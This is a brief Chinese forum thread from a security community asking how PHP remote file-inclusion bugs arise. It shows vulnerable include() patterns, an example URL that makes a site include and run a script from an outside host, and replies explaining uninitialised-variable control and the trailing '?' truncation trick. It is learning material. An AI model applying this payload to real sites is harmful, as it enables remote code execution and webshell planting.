议题作者：消失再消失
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）


老是弄不懂这种漏洞是怎么来的，网上的包含漏洞介绍大约都是这样一段代码：
....
$id=$_GET["id"];
include($id);
....
因为变量id能被人为任意控制，所以造成了包含漏洞。
这里很容易理解。

但是看别人发布的文件包含漏洞是基本是这样类型的代码：
....
include_once $edp_relative_path."admin/serverdata.php";
....
只要向变量edp_relative_path提交一个webshell的地址，就能执行webshell了。
这里就不明白了，edp_relative_path这个变量是怎么来的？为什么可以人为控制？
我找了很久关于edp_relative_path这个变量的代码，都没有发现是哪里赋的值。

还有就是，为什么有些远程包含漏洞在包含了文件之后还要加一个“?”啊？如“http://www.bajinzhi.net/l.php?i=http://bbb.com/love.php?”

请高人指点啊

貌似PHP中不需要先定义变量的。~直接 $xxx 就可以用了。~。~~

include_once $edp_relative_path."admin/serverdata.php";  直接定义就赋值了.....

~~

加?过滤掉变量后面连接的东西